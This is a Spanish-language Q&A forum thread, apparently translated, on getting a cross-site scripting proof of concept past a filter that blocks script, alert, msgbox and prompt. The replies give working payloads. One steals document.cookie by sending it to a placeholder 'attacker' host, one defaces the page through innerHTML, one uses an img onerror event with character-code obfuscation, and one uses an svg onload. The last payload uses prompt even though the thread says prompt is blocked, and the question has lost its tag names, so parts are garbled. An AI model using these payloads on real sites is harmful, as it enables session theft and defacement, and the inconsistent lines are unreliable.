Me he topado con un campo que es vulnerable a XSS. Acepta y etiquetas sin embargo las palabras clave script, alert, msgbox, prompt están bloqueadas. He intentado todas las versiones codificadas de estas palabras clave, pero no funciona.
¿Hay alguna forma de que pueda mostrar un POC (XSS emergente) sin usar las palabras clave anteriores?
Inyecté con éxito un marco y las cookies tampoco son solo HTTP.
Ningún atacante usará alert() , verificar esto dentro de una cadena de ataque es más que solo una pérdida de tiempo, muestra que el desarrollador no entiende cómo se ataca el software.
Podría mostrar un ataque real, donde lea un token CSRF o el valor document.cookie :
document.write("<img src=http://attacker/cookie_theif?c="+document.cookie+" />")
También puede volver a escribir la página, esto podría usarse para convertir la página en una página de fases:
document.body.innerHTML="owned:"+document.cookie
<img src=x onerror=confirm(String.fromCharCode(88,83,83))>
Si el sitio usa SVG como imágenes, puede usar este:
<svg onload=prompt(1)>
No se necesita la palabra <script> , alert , msgbox ni la palabra prompt .
Lea otras preguntas en las etiquetas web-application xss